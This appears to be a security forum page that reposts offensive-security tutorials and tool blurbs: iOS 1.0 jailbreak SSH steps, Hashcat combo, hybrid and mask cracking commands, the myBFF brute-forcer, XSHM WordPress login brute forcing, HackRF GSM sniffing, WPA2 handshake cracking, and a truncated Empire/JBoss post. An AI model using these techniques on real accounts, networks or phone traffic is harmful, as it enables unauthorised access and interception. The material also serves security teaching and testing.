Nytro

pev pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries. This is the current source for a likely unreleased version. Use at your own risk. For more information and stable releases, please refer to http://pev.sourceforge.net/ How to get the source code? git clone --recursive https://github.com/merces/pev.git How to build on Linux? cd pev make NOTE: You may need to install OpenSSL using your package manager. Examples: apt-get install libssl-dev yum install openssl-devel How to build on OS X? cd pev CFLAGS="-I/usr/local/opt/openssl/include/" LDFLAGS="-L/usr/local/opt/openssl/lib/" make NOTE: You may need to install OpenSSL via Homebrew: brew update brew install openssl brew link --force openssl How to build on Windows (via Cygwin)? cd pev make make zip NOTE: The following packages must be installed along with your Cygwin: - gcc-core - binutils - make - zip - openssl-devel - git (just to clone de repository and make things easier) Please check the online documentation for more details. Link: https://github.com/merces/pev

Jonathan Zdziarski ‏@JZdziarski 1h1 hour ago In honor of the iPhone’s 10th Anniversary, here are the original jailbreak instructions for iOS 1.0 Opening the iPhone NerveGas has the spirit. It exploits Apple's 'generosity' in leaving things inside the (only) perimeter 'wide open'.NerveGas on #iphone figured out a clever way of enabling SSH on the iPhone. First he overwrites the update binary with chmod. Then he tricks the iPhone into calling update so he can reset the mode of the Dropbear server to make it eXecutable. Then he puts everything back where it was. Mission accomplished! Working SSH Instructions by NerveGas Previous instructions on the net have required the use of restore mode to set binary permissions. Unfortunately, restore mode doesn't work with all public versions of iPhoneInterface I've tried. The instructions below work by overwriting an existing binary on the system with chmod, and then calling it with the appropriate arguments to set permissions. The result is a fully functional SSH setup. You can then proceed to uploading your own world builds, or other programs to execute via commandline. Step 1: Key creation. On your Mac or PC download Dropbear from here: http://matt.ucc.asn.au/dropbear/dropbear.html Run: ./configure && make You don't need to install the software, just run: ./dropbearkey -t rsa -f dropbear_rsa_host_key ./dropbearkey -t dss -f dropbear_dss_host_key And copy the two new key files into your iPhoneInterface directory. Step 2: Uploading Dropbear and friends. Download the iphone-ssh kit and the iphone binaries kit: http://www.abigato.com/iphone-ssh-kit-vr1.tar.bz2 http://netkas.freeflux.net/blog/ Rename sh6 from the kit to sh. Use the jailbreak application to break out of jail and then open iPhoneInterface to connect. mkdir /etc/dropbear cd /etc/dropbear putfile dropbear_rsa_host_key putfile dropbear_dss_host_key cd /bin putfile chmod putfile sh cd /usr/bin putfile dropbear Step 3: Overwriting 'update' with 'chmod'. While still connected to iPhoneInterface make a backup copy of /usr/sbin/update: cd /usr/sbin getfile update Rename this to update.original on your local filesystem Now copy the 'chmod' binary to 'update' and upload it back to the iPhone: cd /usr/sbin putfile update Step 4: Overwriting the update configuration. Now the 'update' binary is really 'chmod' and has execute permissions! We just need to tell the iPhone to chmod next time it boots. To do this, we download /System/Library/LaunchDaemons/com.apple.update.plist and add our own arguments to ProgramArguments: 0 /usr/sbin/update 1 555 2 /bin/chmod 3 /bin/sh 4 /usr/bin/dropbear Save the new plist and upload it back to the iPhone: cd /System/Library/LaunchDaemons putfile com.apple.update.plist While we're here, lets also: putfile au.asn.ucc.matt.dropbear.plist Step 5: Reboot the iPhone twice. The first reboot should set the permissions on the dropbear and related binaries. The second reboot should start dropbear, so you can ssh to it: ssh -l root [IP ADDRESS] The root password is 'dottie'. Step 6: Replace the original update and com.apple.update.plist files. Don't forget to put the old update files back. Rename update.original back to update, and delete the extra ProgramArguments you added to com.apple.update.plist. Now put them back: cd /System/Library/LaunchDaemons putfile com.apple.update.plist cd /usr/sbin putfile update Step 7: Change the root password. If you don't like 'dottie', you can generate a new encrypted password by running: perl -e 'print crypt("MYPASSWORD", "XU");' Where MYPASSWORD is the new password you want, and XU is a random two-letter salt. Copy the encrypted output and replace the existing one in /etc/master.passwd on the phone. You're done! Enjoy! -NerveGas Sursa: http://rixstep.com/2/2/20070805,00.shtml

Cracking 12 Character & Above Passwords Combo & Hybrid Password Attacks January 8, 2017 · Hash Crack,Password Cracking,Cyber Security Cracking The 12+ Character Password Barrier, Literally 12 Characters? Are you serious?! What do I mean by cracking 12 characters passwords and above? I'm simply stating that with modern hardware, like the "budget" cracking rig, we can almost exhaustively search the highest probability keyspace for candidate passwords, against fast hashes like MD5, NTLM, SHA1, etc..., in a reasonable amount of time. Normally anything above 8 characters isn’t practical and/or feasible to brute force against standard fast hashing algorithms. When factoring in language and human peculiarities, like the average English word is only 4.79 characters long and people preferring multiple common words when creating 10 characters or longer passwords, you are within cracking distance of these passwords. For a quick reference guide to the various cracking tools and their usage check out Hash Crack on Amazon. Why are 12+ character passwords vulnerable? Practically speaking, people that manually create passwords above 10 characters, for the most part, use common words or phrases. Why do they do this? Because remembering the password "horsebattery123" is way easier than "GFj27ef8%k$39". It's just simple human behavior exhibiting path of least resistance that will always exist and, until auto-generating password managers gain mass adoption, this vulnerability will always be around. I agree that XKCD's password strength cartoon of four random words is sound but only for non-fast hashing algorithms like bcrypt. In this article we will demonstrate Combo and Hybrid Attacks using Hashcat that will expand your cracking knowledge toolkit. These examples will show how an attacker can efficiently attack this larger keyspace, with modern hardware, and make these so called strong passwords succumb to his cracking methodology. Combo & Hybrid Attack Background First a quick background of these attack methods: Combo Attack: all words in two dictionaries are appended to each other. EXAMPLE dictionary1.txt dictionary2.txt pass => password, passpass, passlion word => wordpass, wordword, wordlion lion => lionpass, lionword, lionlion Hybrid Attack: a dictionary attack but with the ability to append/prepend a brute-force mask. EXAMPLE dictionary.txt ?u?l?l pass => passAbc, passBcd, passCde word => wordAbc, wordBcd, wordCde lion => lionAbc, lionBcd, lionCde *password candidate generation order not completely accurate but you get the idea **further explanation can be found at the Hashcat website Combo Attack Let's look at how the Combo attack can help us with passwords that are English words appended to each other, and the best dictionary to get the job accomplished is Google's 10,000 most common words list. This is a list of the 10,000 most common English words in order of frequency, as determined by n-gram frequency analysis of the Google's Trillion Word Corpus. Now lets use an example of two randomly selected english words combined to form a 16 character password like shippingnovember. Here's how we would combo attack this password with Hashcat if it was hashed as an Md5: Example hashcat -a 1 -m 0 hash.txt google-10000.txt google-10000.txt By having Hashcat combine every word in this list to each other the password falls in less than 1 second using modern hardware. Not too shabby and this attack will still work reasonably well against some of the medium to slower hash types as well. Before the critics say, "Well you could just capitalize the words or add a digit or special character and you would be fine to form a new password like ShippingNovember. Well let us test that theory real quick. Let's combine that google-10000 dictionary into one single dictionary using Hashcat utils "combinator.bin". This allows us to manipulate the combined words with rules. Example combinator.bin google-10000.txt google-10000.txt > google-10000-combined.txt Now that we have our newly combined dictionary we can just run a rules based attack against the new modified password ShippingNovember using Hashcat like below: Example hashcat -a 0 -m 0 hash.txt google-10000-combined.txt -r best64.rule This one falls in 28 seconds, so much for that theory. And we could create rules to account for added special characters, non-traditional placement, 133t speek, etc... you get the point. 3 Words Now using the combined dictionary we just created let's go after a three word random phrase password like "securityobjectivesbulletin"...looks pretty strong right? But since we just created the new "google-10000-combined.txt" dictionary we can use the combo attack again like the following with double-words in the first dictionary and single words in the second dictionary: Example hashcat -a 1 -m 0 hash.txt google-10000-combined.txt google-10000.txt This one could have been a little more difficult if some character variation was added but as you can see the straight random english words fall in 2 seconds. Are you seeing a trend here yet? 4 Words Let's go big and attack the XKCD password instructions of four random english words to create a new password "sourceinterfacesgatheredartists". This addition of one more word just drastically increased our keyspace to 10,000,000,000,000,000 candidates, but just like the previous attacks it will fall, mostly because of us using MD5 as the hashing function. Again we will use our newly created "combined" dictionary twice and tell Hashcat to perform a combo attack: Example hashcat -a 1 -m 0 hash.txt google-10000-combined.txt google-10000-combined.txt This cracking attempt could have taken 4 days to complete, using modern hardware, but luckily we found the candidate just 5hrs 35mins into the cracking session. Simple modifications to this password like numbers or special characters in the middle would have made this password beyond our reach but again random common words is no match. Hybrid Attack Hybrid Attacks take a little more creativity to find interesting attack plans but it's so much fun when you find that perfect pattern. It's like gold mining for passwords, when you hit that rich vein of patterns and the passwords begin to scroll by in real-time in your terminal, you could almost levitate out of your seat. Google-10000 + Mask For the first example we will use our previous work from the Combo Attack demonstration and incorporate the google-10000.txt list to form the base words of our candidate generation. Then we are going to break out PACK (Password Analysis and Cracking Kit) and focus on the hashesorg251015.txt dictionary from weakpass.com. I picked the hashesorg dictionary because of its efficiency rating of 65.9 and its relatively small size. What we will do is analyze the hashesorg dataset and create masks based on the most popular password patterns constrained to a certain character length. These masks will be appended/prepended to our base words from google-10000.txt to form an efficient Hybrid Attack. PACK Example Generate initial mask statistics studying passwords of length 5-6 characters and output to a masks file. (Be aware this may take some time to generate) python statsgen.py hashesorg251015.txt --minlength=5 --maxlength=6 --hiderare -o hashesorg_5or6.masks Now let's output the masks into Hashcat format into a .hcmasks files so we can use them seamlessly within a Hashcat Hybrid Attack; PACK Example python maskgen.py hashesorg_5or6.masks --optindex -o hashesorg_5or6.hcmask We can now begin the Hybrid Attack using attack mode 6 in Hashcat to append the newly created hashesorg masks file. This will launch a sequential attack beginning with the first mask and working its way down the list. Some attacks will go very quickly and others could take a little more time. For testing purposes we will use a random password 'environmentsqaz472" we know will hit eventually during the attack. Example hashcat -a 6 -m 0 hash.txt google-1000.txt hashesorg_5or6.hcmask This attack took nearly 20 minutes before it eventually cracked reaching the mask ?l?l?l?d?d?d and then it hit with 14 seconds of starting that attack. Rockyou + Rockyou-1-60.hcmask Now let's use Hashcat's built-in mask derived from the Rockyou password dataset. The rockyou masks in Hashcat have been broken into smaller chunks that grow in size based on the numbering, which what I assume accounts for the percentage of passwords that fall within that category of masks. We are going to use the smallest .hcmask file rockyou-1-60 because it contains the higher probability masks and it works well with a Hybrid attack. We are also going to pair this with the actual Rockyou passwords which can be retrieved <HERE> at Skullsecurity. Be carefully when pairing with a dictionary to ensure the dictionary is not too large, otherwise your attacks will take a VERY long time. I like to keep my Hybrid dictionary size below 500MB and even smaller based on the masks I plan to append/prepend. Let's draw at random from the Rockyou dictionary the password "sophia**!" and we will add an arbitrary date just like a user would to the front of "1996". This leaves us with the password 1996sophia**! to test against. Again this attack is going to run through the lists of mask sequentially contained in the rockyou-1-60 dataset and append to them to every password contained in the Rockyou dictionary. Example hashcat -a 7 -m 0 hash.txt rockyou-1-60.hcmask rockyou.txt This attack hits on a mask of ?d?d?d?d after only a few minutes. Again this is for demonstration purposes but shows the process and power of generating Hybrid Attacks. The rockyou-1-60.hcmask contains 836 different masks representing the top occurrences in the rockyou.txt dictionary, and if that variation isn't enough for you Hashcat includes ALL the masks for the rockyou dataset. Cut First 5 Chars + Mask Let's get creative and create our own dictionary and masks to pair with a Hybrid Attack and since we learned that the average English word is 4.79 characters long we will make our dictionary contain words only up to 5 characters long. We will again use the rockyou.txt dictionary for this example. Here is an how we can chop the first 5 characters from the dictionary and sort it uniquely into our new first5_dict.txt dictionary. Depending on your hardware this may take some time to complete. You will also notice this new dictionary comes out to 18MB's in size which is a little on the small side for an attack against MD5 but would be perfect for a slower hash. Example cut -c 1-5 rockyou.txt | sort -u > first5_dict.txt Let's pair this new first5_dict.txt dictionary again with the rockyou-1-60 masks built into Hashcat. Now I know some candidates generated will be below 12 characters but you can always sort out the masks that are below 7 chars and create a new .hcmask file. Now again let's create a random password from the list we will chose Alty5 from the first5_dict.txt and random digits 9402847 to combine them into Alty59402847 Example hashcat -a 6 -m 0 hash.txt first5_dict.txt rockyou-1-60.hcmask This attack is especially effective against users who love using the same base words or digits for their passwords but append or prepend "randomness" to the passwords based on the account. This password falls within a total of 30mins. Straight Mask Attack 12 Chars + I know this isn't a Hybrid attack but it's worth mentioning that 12 character mask attacks are still reasonable, especially if you formulate them using the PACK tool. A 1 day attack (86400 seconds) can be formulated using the speed of your rig against a certain hash type, which can be measured by performing a hashcat -b -m #type from the terminal. Let's quickly show how to follow these steps to create a mask attack for passwords from 12 - 15 characters in length using PACK. Let's again use the rockyou.txt dictionary as an example to generate these masks, but let's first estimate the speed of our cracking rig against md5 hashes. Example (md5) hashcat -b -m 0 Now that we know our rigs cracking speed is 76 billion (76,000,000,000 c/s) let's create the new masks using PACK from the rockyou.txt dictionary. Example python statsgen.py rockyou.txt -o rockyou.masks We can now create our Hashcat hcmask file tailored to a 1 day (86400 seconds) cracking speed attack which covers character lengths of 12-15. Example pythong maskgen.py rockyou,masks --optindex --minlength=12 --maxlength=15 --targettime=86400 --pps=76000000000 -o rockyou_12-15.hcmask Now we can run a series of masks attacks using rockyou_12-15.hcmask against md5 hashes we know will complete within 1 days time. Pretty awesome right?! Example hashcat -a 3 -m 0 hash.txt rockyou_12-15.hcmask Conclusion So as you can see 12 character passwords are not that inconceivable to crack. It just takes a little finessing and a little creativity to formulate the correct strategy. Also don't always assume that since your password is above 11 characters that the online service you trusted with this password is going to hash it properly, thanks $4.8billion company Yahoo. I hope I've demonstrated that you need unique words, digits and not just four random common words all lowercased, and if you need more convincing check out my friend Troy Hunt's write-up <HERE>. If you are really smart you will begin using a password manager like 1Password or Keepass to generate and database your passwords across devices. I'd like to plug Dumpmon's twitter feed as a good place to find hashes to practice on for research purposes. You can follow me on Twitter @netmux, and lastly for a good pocket reference guide on cracking tool usage and syntax check out Hash Crack. "The cyber general who wins the battle makes many calculations in the terminal before hacking begins." - Cyber Sun Tzu Sursa: http://www.netmux.com/blog/cracking-12-character-above-passwords

myBFF is a web application brute force framework (currently) Point the framework at a file containing usernames, a host, and give it a password. The framework will determine what type of web application is in use, then attempt to brute force accounts. After brute forcing accounts, myBFF will then do a little more, like enumerating apps available, and reading in important data. Each module is different so try them out! Current modules: HP SiteScope (will attempt to give you a Meterpreter Shell!) Citrix Gateway (also enumerates authorized applications) Juniper Portal (Will look for 2FA bypass and list what is accessible) MobileIron (Unknown. Have to find out what is accessible first!) Outlook/Office365 (will parse email, contacts, and other data from email) Wordpress (Will be adding "SomethingCool" soon) CiscoVPN (Enumerate User accounts (May not work on all configurations)) Okta (Enumerate Applications and check if 2FA is setup for account) Jenkins (Will be adding "Something Cool" soon) SMB (Check if user is an administrator) (must use --domain with this module. for host, use smb://) FTP (List root dir contents) New modules will be added. CONFIGURATION myBFF requires lxml and pysmb. Install using 'sudo apt-get install python-lxml' 'sudo pip install pysmb' Link: https://github.com/MooseDojo/myBFF

Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques Jan 04, 2017, Version 1.0 ©2017 – Aptive Consulting Ltd This document and the templates used in its production are the property of Aptive Consulting Ltd and cannot be copied (both in full or in part) without the permission of Aptive Consulting Ltd. While precautions have been taken in the preparation of this document, Aptive Consulting Ltd the publisher, and the author(s) assume no responsibility for errors, omissions, or for damages resulting from the use of the information contained herein. The information herein is provided for educational and informative purposes only, Aptive Consulting Ltd the publisher and author(s) take no responsibility or liability for the actions of others. 2 | A p t i v e phone: +44 (0)3333 440 831 | email: contact@aptive.co.uk | web: https://www.aptive.co.uk Introduction The intent of this document is to help penetration testers and students identify and test LFI vulnerabilities on future penetration testing engagements by consolidating research for local file inclusion LFI penetration testing techniques. LFI vulnerabilities are typically discovered during web app penetration testing using the techniques contained within this document. Additionally, some of the techniques mentioned in this paper are also commonly used in CTF style competitions. Download: https://www.exploit-db.com/docs/40992.pdf

Identifying WordPress Websites On Local Networks (behind Firewalls) and Bruteforcing the Login Pages Last Updated: Thu, 05 Jan 2017 - by Sven Morgenroth Statistics from w3techs suggest that 1 out of 4 websites (around 25%) on the internet are powered by WordPress. WordPress’ popularity is derived from its ease of setup and use, its contributing community, and the big repertoire of plugins and themes that are available. Why is WordPress Such a Common Target? Even though WordPress is a beginner friendly web application, like every other platform it has its own issues and limitations. One of the most voiced security issues is that it is possible and very easy to bruteforce login credentials. WordPress’ advice on this is to install a security plugin, protect the WordPress login page with a .htpasswd file (HTTP authentication), and of course use strong credentials. However many users, especially the unexperienced ones do not take these extra security measures onboard. They use very weak credentials and do not setup any additional layers of security on their websites, thus making WordPress a good target for brute force attacks. How to Bruteforce WordPress Websites and Blogs Running on an Internal Networks and Behind Firewalls WordPress blogs aren’t always used for publicly accessible websites. They are also frequently used as websites in intranets for employees. Typically Intranets are not reachable from the outside (the internet) because they are sitting behind a firewall. Though WordPress websites running in intranets are still at risk; attackers can effectively brute force a WordPress blog or website in an internal network via XSHM, without having direct access to it. What is XSHM? XSHM is an abbreviation for Cross Site History Manipulation. It is a security breach in the Same Origin Policy, which is used by web browsers to prevent different websites from retrieving information from each other when a user is accessing them both. This means that website A can not read the content of website B when both are accessed at the same time in different browser tabs. However, there are some side channel attacks that can be used to leak certain information even though the same origin policy is in place. XSHM is one of them and below is an example: An attacker creates an iframe on a website he controls (website A) and points it to a page on website B that has a conditional redirect. For example the iframe points to login.php, which when accessed redirects the user to index.php if he is logged in. The attacker retrieves the history.length value of the browser tab. The attacker updates the iframe to point to index.php. When the user accesses the iframe again, the attacker retrieves the new value of the history.length property again and compares it to the one in step 2. Since the web browser does not increase the history.length value if the URL the iframe is the same as the URL the user is currently browsing, then it is easy to determine if the user is logged into WordPress or not. Therefore if the history.length value remains the same, it means that the user was redirected to index.php, which means he is logged in. How to Identify WordPress Websites on a Local Network WordPress has a unique redirect, that makes it really easy for attackers to spot. If a user is not logged in and visits the page /wordpress/wp-admin/, he is redirected to: /wp-login.php?redirect_to=http%3A%2F%2Fexample.com%2Fwordpress%2Fwp-admin%2F&reauth=1 Using XSHM Therefore to find WordPress websites on an internal network an attacker can send the victim a link with a XSHM payload, that tries the above redirect on a range of internal IP addresses such as 192.168.1.1/24 when a user clicks the link. Using JavaScript The attacker can also use JavaScript to scan internal networks for websites running on WordPress. For example by using WebRTC, like implemented in the BeEF framework he can narrow down the list of live hosts which has to be checked for the above WordPress’ redirect. Once the scanning is done the attacker should have a list of internal IPs running WordPress. You can download a PoC of the JavaScript. How does bruteforcing WordPress logins work with XSHM? Now that the attacker identified the WordPress websites he can start the brute force attacks with XSHM, even though he does not have direct access to it. This is possible due to the fact that WordPress does not have a token to prevent logins via CSRF. There is a general misunderstanding of whether or not CSRF Tokens are necessary in login forms. Note: Tokens in login pages are necessary. It is generally advised to secure your WordPress login page with Tokens to prevent these type of attacks. There are several other attack vectors that use the login CSRF as entry points, which are not obvious but can have serious impacts, such as logging the user in an attacker’s account without his knowledge and steal private information. It might also be possible to abuse an otherwise not reachable Stored Cross-site Scripting (XSS) vulnerability. WordPress also provides a redirect_to form field in its login, which lets the attacker specify where he wants the victim to be redirected after a successful login. This suits perfectly the attacker’s XSHM attack. He can now use a website which makes a CSRF attack based on GET parameters and supply different username / password combinations. The attack works as follows: Retrieve the value of the history.length property of the victim’s browser tab. Point the src of the iframe to the page that carries out the CSRF attack. This can be done by using a self-submitting form to the wp-login page with a username / password combination. Point the iframe to the path from the redirect_to parameter Check the value of the victim’s history.length From the value of the history.length property the attacker can now tell whether or not the attack was successful, because the attacker knows that a successful login means that wordpress redirected the user to the page in the redirect_to parameter. Therefore if the value of the history.length property does not increase, he knows that the attack was successful. The attacker is also able to tell if a CSRF attack worked under certain conditions, which usually isn’t possible due to Same Origin Policy. Proof of Concept Video Below is a proof of concept video of how WordPress websites running on internal networks can be identified, even when running behind a firewall, and how then a bruteforce attack is launched against them. Limitations and Problems of the WordPress Login Page Attack via XSHM The Attack is Easily Noticed In order for this WordPress attack to succeed the attacker needs at least two interactions from the victim: First he must convince the victim to visit his malicious web page. After that the victim must click a button or link on the attacker’s page that opens a new browser window or tab. This is required since it is not possible to open a new window or tab without user interaction, because of popup blockers. Since the victim can easily notice the new opened tab and the page refreshes the chances of the victim not noticing the attack are very slim. Also, the attacker can’t just create a simple iframe as the wp-login page is secured with X-Frame-Options. This might cause problems in some web browsers since they might not increase the history.length value if this header is set, thus could be very difficult for an attacker to determine if there is a WordPress or not. Different Browsers' Behaviour Complicates Matters Another problem is that some browsers such as Chrome always change the value of the history.length property, even if the attacker redirects the iframe to its current src. This might be a counter measure for the XSHM attack, and in fact the attack will fail. So how can the attacker change the history.length without an iframe on the current page? Using Window.Opener in the XSHM Attack The answer is window.opener. If a new browser window or tab is opened from another tab, either by clicking a link or with javascript, the new page can access its parent’s window object. It is even possible to get the value of the history.length property if the page is from the same origin. At first this does not seem very useful, since the attacker needs to know the value of history.length property after redirecting to a cross origin page to carry out the XSHM attack. But since the attacker can set the location of the parent window, even via cross-domain he can do the following: Open a child window from his page, for example attacker.com/opener.html -> attacker.com/child.html In the child window the attacker uses the opener.history.length to retrieve the history length from attacker.com/opener.html Set the location of the opened window to http://192.168.1.123/wordpress/wp-admin/ using opener.location Set window.opener.location to http://192.168.1.123/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.123%2Fwordpress%2Fwp-admin%2F&reauth=1 Set opener.location back to attacker.com/opener.html to be on the same origin again. Now the attacker should be able to get the value of opener.history.length again and compare it to the one from step 2. This way the attacker can also bypass the X-Frame-Options protection against XSHM. This could also be stealthily done by using a popunder window. The Maximum Value of the history.length Property Another problem that might hinder these type of attacks is the maximum value of the history.length property. For example on Chrome its highest value can be 50. If the value needs to be increased and it is already at 50, the first (oldest) entry is removed and the last entry is added. This can be a problem when doing a Cross Site History Manipulation attack, but as a workaround the attacker can: Trick the victim into visiting a url from the same origin with window.opener.location. Then trick the victim again to navigate back to the first page he visited in the current session with window.opener.history.go(- (window.opener.history.length-1)). This first retrieves the amount of pages the user can go back and then goes back to the first page. Set the URL to a new link. The history value is 2 now. This way the attacker bypasses the problem of the 50 entries limit. Dealing with Logout CSRF Protection Another hurdle for the XSHM attack is the logout CSRF protection. If the user is logged in the attacker usually can’t reliably check whether or not there is an actual WordPress installation on the server, so he can’t brute force the login page with a user that is already logged in. Well WordPress is a little special in this case. When the victim visits wp-login.php he is greeted with a login prompt whether or not he is logged in. This would solve the problem the attacker would have with bruteforcing credentials, however it is still not possible to reliably check with wp-login / wp-admin if there is a WordPress installation on the web server. But WordPress has an additional parameter you can set to actually log you out when you visit wp-login. It is called reauth. When it is set to 1 you are automatically logged out, which means the attacker can try to point the victim to wp-admin and see if it redirects him to wp-login again. How can You mitigate against the XSHM Attack? As a WordPress user you can’t take any precautions to prevent XSHM attacks, since this is a browser feature you can’t control. You can only rely on the developers of the respective website to take all the necessary precautions that prevent XSHM attacks. These include: Avoiding conditional redirects that can leak sensitive information. Using of CSRF Tokens. It can also be a good idea to add random characters to the URL. These don’t have to be connected to any application level logic, like CSRF tokens do, but can make it difficult for an attacker to guess the exact link where the victim will be redirected to. Note: While there is a proof of concept for this WordPress attack it is unlikely to be used in a real life scenario because of the knowledge that is required about the target and because of the long time the victim has to spend on the attacker’s page, while having a refreshing window in plain sight. Sursa: https://www.netsparker.com/blog/web-security/bruteforce-wordpress-local-networks-xshm-attack/

SNIFFING GSM TRAFFIC WITH HACKRF. While my friend and colleague Simone was visiting our ZIMPERIUM – Enterprise Mobile Security TLV office, we got our hands on HackRF and hacked together the unguarded boarders of Radio Frequencies. Simone had the great patience to try and explain me the boring world of complex numbers and friends (more on that here), but my dyslexia won over again and left me to fill the gap by following Simone’s steps (and some mistakes, eh Simone?) and use my ‘trial & error’ approach until success. This tutorial is the result of our collaborate GSM hacking session, presented with the hope it will be useful for others. TOOLS USED: hackrf_kalibrate gnuradio-companion gr-gsm gqrx wireshark INSTALL REQUIREMENTS: First thing, you want to make sure you have all the required software installed, you can install most of them and their dependencies using your distribution package manager. Let’s start with the libraries and tools for the hackrf itself, on a Debian/Ubuntu distro you’ll install them like so: 1 sudo apt-get install hackrf libhackrf-dev libhackrf0 Once these libraries are installed, you can plug your hackrf into one of your USB ports and execute the hackrf_info command, at this point you should see something like the following: 1 2 3 4 5 6 7 # hackrf_info Found HackRF board. Board ID Number: 2 (HackRF One) Firmware Version: 2014.08.1 Part ID Number: 0x00574746 0x00574746 Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f4339e1 You will now install gnuradio which is the software we’ll use to decode the RF signals, gqrx a tool to visualize signal power on certain frequencies and everything else that will be needed in the next steps: 1 sudo apt-get install gnuradio gnuradio-dev gr-osmosdr gr-osmosdr gqrx-sdr wireshark Proceed with gr-gsm, the GnuRadio blocks that will decode GSM packets: 1 2 3 4 5 6 7 8 9 sudo apt-get install git cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy git clone https://github.com/ptrkrysik/gr-gsm.git cd gr-gsm mkdir build cd build cmake .. make sudo make install sudo ldconfig Now create the file ~/.gnuradio/config.conf and paste the following contents into it: 1 2 [grc] local_blocks_path=/usr/local/share/gnuradio/grc/blocks Finally install kalibrate-hackrf, a tool that will hop among known GSM frequencies and will tell you which your country is using: 1 2 3 4 5 6 git clone https://github.com/scateu/kalibrate-hackrf.git cd kalibrate-hackrf ./bootstrap ./configure make sudo make install FINDING GSM FREQUENCIES: Each operator in each country uses a different frequency in the GSM possible spectrum, which usually starts from 900Mhz. You can use hackrf_kalibrate to find the frequencies you want to sniff: 1 ./kal -s GSM900 -g 40 -l 40 Note the two gain values, those are important in order to get some results. Leave kalibrate running and after a while you should see an output similar to this: You will have to use the proper GSM parameter (‘-s’) to correspond to your local operator. Consult this list for verification. Sometimes you might want to see the frequencies in order to ensure correct results from hackrf_kalibrate, or to save yourself from calculating the correct frequency given by hackrf_kalibrate (notice the +/- Khz sign of each result – this means the top peak with the corresponding power,not 100% correct frequency). Open gqrx and tune it to the first frequency you got from hackrf_kalibrate, for example 940.6Mhz, and you’ll see something like the following picture: In the above screenshot you can visually see the activity is around 945Mhz. Once you know the GSM channels frequencies, you can start gr-gsm by running the python script ./airprobe_rtlsdr.py or load the airprobe_rtlsdr.grc file using gnuradio-companion and set one of the channel frequencies you just found in the frequency field. Don’t forget to add ‘gain’ value again, move back to the frequency field and start pressing the UP/DOWN arrows on your keyboard to start scrolling the frequencies in 200Khz steps until you start seeing some data in your console window. The whole process should look something like this: Now you only need to launch wireshark from another terminal tab with the following command: 1 sudo wireshark -k -Y 'gsmtap && !icmp' -i lo If gr-gsm did his job, you should be able to see decoded GSM traffic sniffed by your hackrf. WRITTEN BY Z4ZIGGYMAY 17, 2015 Sursa: https://z4ziggy.wordpress.com/2015/05/17/sniffing-gsm-traffic-with-hackrf/

Nokia 6 este primul smartphone sub acest brand echipat cu sistem de operare Android Cătălin Niţu - 9 ian 2017 HMD Global, compania finlandeză care controlează brandul Nokia în prezent, a anunţat în sfârşit mult aşteptatul smartphone Nokia 6, primul dispozitiv al companiei bazat pe sistemul de operare Android. Acesta vine cu hardware nu tocmai puternic pentru întoarcerea unui brand atât de mare pe piaţă, însă va avea un preţ accesibil. Probabil că majoritatea celor interesaţi de noile telefoane Nokia cu Android vor fi însă dezamăgiţi de faptul că va fi lansat exclusiv pentru piaţa din China. zoom in Nokia 6 este un smartphone care ar putea fi încadrat în gama mid-range premium, fiind echipat cu hardware de medie, învelit în materiale de calitate precum sticlă şi aluminiu. Vorbim despre un dispozitiv cu display de 5,5” şi rezoluţie Full HD, chipset Snapdragon 430, 4 GB memorie RAM, 64 GB spaţiu de stocare şi camere foto de 16, respectiv 8 megapixeli. Acest hardware a devenit deja standard chiar şi pe dispozitive mid-range, însă procesorul pare să fie dintr-o gamă mai ieftină, cu performanţă limitată. Sistemul de operare pre-instalat va fi noul Android Nougat, însă nu cât de diferită este interfaţa proprietară faţă de cea standard de la Google. Lansarea este programată pentru „începutul anului 2017”, la un preţ de 1699 yuan, adică aproximativ 250 de dolari americani. Problema este că în China există deja multe brand-uri locale care oferă dispozitive mult mai puternice cu o construcţie similară la preţuri similare. Via: http://www.go4it.ro/telefoane-mobile/nokia-6-este-primul-smartphone-sub-acest-brand-echipat-cu-sistem-de-operare-android-video-16053801/

Sunday, January 8, 2017 How to crack WLAN - WPA/WPA2 pre shared keys To crack WPA/WPA2 pre shared keys may not so difficult as many people think. When an client authenticates at the router, there is a 4-way handshake between router and client, to handshake a session key, which must be recorded with a simple WLAN sniffer. The messages are called EAPOL. Here I described how to setup a simple sniffer with a raspberry pi-2 http://blog.x1622.com/2016/12/how-to-setup-rasperry-pi-2-model-b-for.html So, the only task to do is to record all the traffic until one of the 4-way handshake gets recorded. In WIRESHARK there exists a display filter called "eapol". In my test case, I opened a WLAN called darkqueen with a simple numeric password 19042001 I authenticated with a mobile device and captured the handshake. In my example I did it more than one time but capturing a complete handshake (1-4) is enough. I stopped capturing and stored all data in a standard wireshark pcap format. You can store all data or mark the EAPOL lines. The standard PCAP file cannot be used direct with HASHCAT. The file has to be converted to hccap format. Here is a description about the different possibilities to do that. https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 It can be done online, or locally using AIRCRACK suite. I took the hccap file to a single machine with an old GPU (~50 Dollar) I got from sons old gaming PC. I started HASHCAT and for eight digits (WPA passwords minimum length is eight) and HASCAT calculated a maximum time of 50 minutes. After few Minutes HASHCAT cracked the password of darkqueen => 1904001 In this POC ist was simple because I used a weak WPA2 key. If it's more complex it may take much more time. In this case, there is also the possibility to pre calculate a rainbow table if the name of the accesspoint is known. Therefor COWPATTY can be used http://tools.kali.org/wireless-attacks/cowpatty Sursa: http://blog.x1622.com/2017/01/how-to-crack-wlan-wpawpa2-pre-shared.html

Exploiting JBoss with Empire and PowerShell When Empire was initially launched by @harmj0y and @sixdub at BSidesLV, I was immediately excited about the possibilities that a pure PowerShell RAT would bring to the offensive community. With what little free time I have, I’ve been working to add a few modules that have been inspired by recent engagements I’ve been on. This post will cover how to enumerate and exploit an internal web service through a deployed Empire agent without port scanning. In this demonstration, I have an empire agent running on a Windows 7 host. The plan is to quietly enumerate the network for vulnerable web services and exploit one to move laterally. First, I load the recon/find_fruit module and set the required options. The find_fruit module accepts CIDR ranges as well as single hosts. The module is also multi-threaded with a default setting of ten threads. One thing that makes this module great for red teaming or quieter penetration testing, is that unlike port-scanning, it uses legitimate web requests to check for web services that we commonly target such as Apache Tomcat, JBoss, Cold Fusion and more. The module will also accept a custom dictionary if desired. Kicking off the module I quickly find some “low hanging fruit” on a host in my target range. Next, I want to create a payload and exploit the JMX-Console. Thanks to a stager by @ch33kyf3ll0w, Empire has 